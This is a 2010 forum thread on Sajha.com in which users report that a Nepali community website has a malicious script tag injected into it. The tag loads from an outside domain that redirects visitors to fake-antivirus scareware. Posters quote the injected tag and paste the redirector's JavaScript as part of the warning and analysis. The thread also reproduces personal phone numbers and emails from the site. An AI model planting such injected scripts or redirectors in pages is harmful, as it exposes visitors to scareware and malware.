Your Banner Here

   [Show all top banners]

Saajha
Replies to this thread:
MillionDollars 4996 days ago
pyaradeshbasiharu 4996 days ago
terobaaje 4996 days ago
Saajha 4996 days ago
pyaradeshbasiharu 4996 days ago
Duracell 4996 days ago

More by Saajha
What people are reading
Subscribers
Subscribers
[Total Subscribers 1]

Slackdemic
:: Subscribe
Back to: Computer/IT Refresh page to view new replies
 Malware link on www.houstonnepalese.org
[VIEWED 8411 TIMES]
SAVE! for ease of future access.
Posted on 08-19-10 12:05 PM     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 

There's some malicious script embedded within www.houstonnepalese.org site. This script, upon execution, redirects browsers to some malware housing site.
 

I tried sending an email to admin@houstonnepalese.org , but it bounced back.

Technical details of permanent failure:


Google tried to deliver your message, but it was rejected by the
recipient domain. We recommend contacting the other email provider for
further information about the cause of this error. The error that the
other server returned was: 554 554 5.7.1 <admin@houstonnepalese.org>: Recipient address rejected: Access denied (state 14).





----- Original message -----

Can someone pass this info to the appropriate website admin(s)?

They should remove the following from their source code:

<script src="http://whereisdudescars.com/js2.php"></script>

Thanks!

~@~
 
Posted on 08-19-10 12:09 PM     [Snapshot: 11]     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 









News arrow Contacts




[Disallowed String for - ] language=JavaScript type=text/javascript>



[Disallowed String for - ] type=text/javascript>



Contacts













Dr. Rupak Rauniar













Address:
6776 Southwest Freeway, Suite 450
Houston, TX 77074









Telephone: T: (713) 773-4348
Fax: F: (713) 773-1948






Information: NAH Emergency Contacts:
1. Gyanshor Shrestha, 832-816-6448, gyanshor@yahoo.com
2. Rupak Rauniar, 713-436-3677, rrauniar@yahoo.com
3. Chej Gurung, 832-526-8750, grgchej@yahoo.com

 

Fill this form out if you want to subscribe to our newsgroup or have any other comments.















 
Posted on 08-19-10 12:27 PM     [Snapshot: 24]     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 

use FF or chrome while Browsing this Site..Google's Safe Browsing API Flags this Site as Hosting/Redirecting to download Scare ware/fake-av.However this Site doesn't seem to host the Exploits.
 
Posted on 08-19-10 12:31 PM     [Snapshot: 49]     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 

Damn bro.....that sucks
 
Posted on 08-19-10 12:42 PM     [Snapshot: 57]     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 

I just spoke with someone and passed the info. Thanks - MillionDollars!

@pyara -- the site isn't hosting the exploit; it's got the redirector that takes your browser to the site that does:

<script src="http://whereisdudescars.com/js2.php"></script>

Do the view source, and look at the bottom of the page; you should see the above script.
whereisdudescars.com is the site that houses the fakeAV stuff.

~@~

 
Posted on 08-19-10 1:01 PM     [Snapshot: 72]     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 

@saajha..It's a Multiple redirect, Seems as if the Actual Landing Point is the Following URL http://www4.checkpc95.co.cc/p=p52dcWplanKHnc3KbmNToKV1iqHWnG3HXpWYxGlqZm%2BVlQ%3D%3D-It triggers the Fake-AV/Scare ware.

This is the Source-code from http://whereisdudescars.com

function sec(conn,v,ex){ var exdate=new Date(); exdate.setDate(exdate.getDate()+ex); document.cookie=conn+"="+escape(v)+";expires="+exdate.toGMTString(); } function gec(conn){ if (document.cookie.length>0){ cs=document.cookie.indexOf(conn+"="); if (cs!=-1){cs=cs+conn.length+1;ce=document.cookie.indexOf(";",cs);if (ce==-1) ce=document.cookie.length;return unescape(document.cookie.substring(cs,ce));} } return ""; } var n=gec("xornopxor"); if (n==""){ sec("xornopxor","1",20); var u="http://www4.checkpc95.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3HXpWYxGlqZm%2BVlQ%3D%3D"; window.top.location.replace(u); 

..Neverthless whoz Life treating You.!!
 
Posted on 08-19-10 1:04 PM     [Snapshot: 79]     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 

I just opened this on my work computer. Does anyone know if this stays on my computer or how to get rid of this?
 

Please Log in! to be able to reply! If you don't have a login, please register here.

YOU CAN ALSO



IN ORDER TO POST!




Within last 30 days
Recommended Popular Threads Controvertial Threads
TPS Re-registration case still pending ..
मन भित्र को पत्रै पत्र!
Guess how many vaccines a one year old baby is given
अमेरिकामा बस्ने प्राय जस्तो नेपालीहरु सबै मध्यम बर्गीय अथवा माथि (higher than middle class)
Travelling to Nepal - TPS AP- PASSPORT
nrn citizenship
Morning dharahara
1974 AD Pinjadako Suga Remixed
Susta Susta Degree Maile REMIXED version
Elderly parents travelling to US (any suggestions besides Special Assistance)?
कल्लाई मुर्ख भन्या ?
ढ्याउ गर्दा दसैँको खसी गनाउच
जाडो, बा र म……
NOTE: The opinions here represent the opinions of the individual posters, and not of Sajha.com. It is not possible for sajha.com to monitor all the postings, since sajha.com merely seeks to provide a cyber location for discussing ideas and concerns related to Nepal and the Nepalis. Please send an email to admin@sajha.com using a valid email address if you want any posting to be considered for deletion. Your request will be handled on a one to one basis. Sajha.com is a service please don't abuse it. - Thanks.
Sajha.com Privacy Policy

Like us in Facebook!

↑ Back to Top
free counters